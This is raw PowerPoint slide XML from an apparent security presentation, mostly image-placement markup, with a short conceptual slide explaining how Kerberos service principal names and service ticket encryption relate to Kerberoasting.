            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A5CAAA-C8CF-49CC-9F3F-186E95C82D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="1038537"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B6DC2-1588-4D79-8E5A-C7AA3647ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336294" y="4323724"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E935F3-B697-403A-BCC3-99D65F8EF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8859744" y="4713869"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5632175" y="2877671"/>
            <a:ext cx="758011" cy="873120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D898C49B-2534-4995-8233-78BD3852326E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3850674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DE2D-1B62-47FB-8F0F-15EB45AF8ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PArt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerbroasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDC8A63F-FE39-45D1-B114-77E3AF48B0C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00804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AD54-8058-4463-8357-A25E1F694177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerbroasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272459FF-9AEA-4341-8A33-AE60F02E1129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos in Windows uses Service Principle Names (SPN) to determine which account key to use to encrypt the service ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“host-based” SPN’s are linked to a domain computer account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“arbitrary” SPN’s are usually linked to a Domain User account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>MSSQLSvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/mssql1.testdomain.com:1433&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>When the user requests a TGS for the service, the KDC will encrypt the session key with the user’s long term key AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>the service account’s long term key.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380201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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>kERBROASTING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A5CAAA-C8CF-49CC-9F3F-186E95C82D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="1038537"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2783721" y="2970472"/>
            <a:ext cx="223434" cy="257364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECDF310-845F-40AB-87EF-977ACB9DC671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
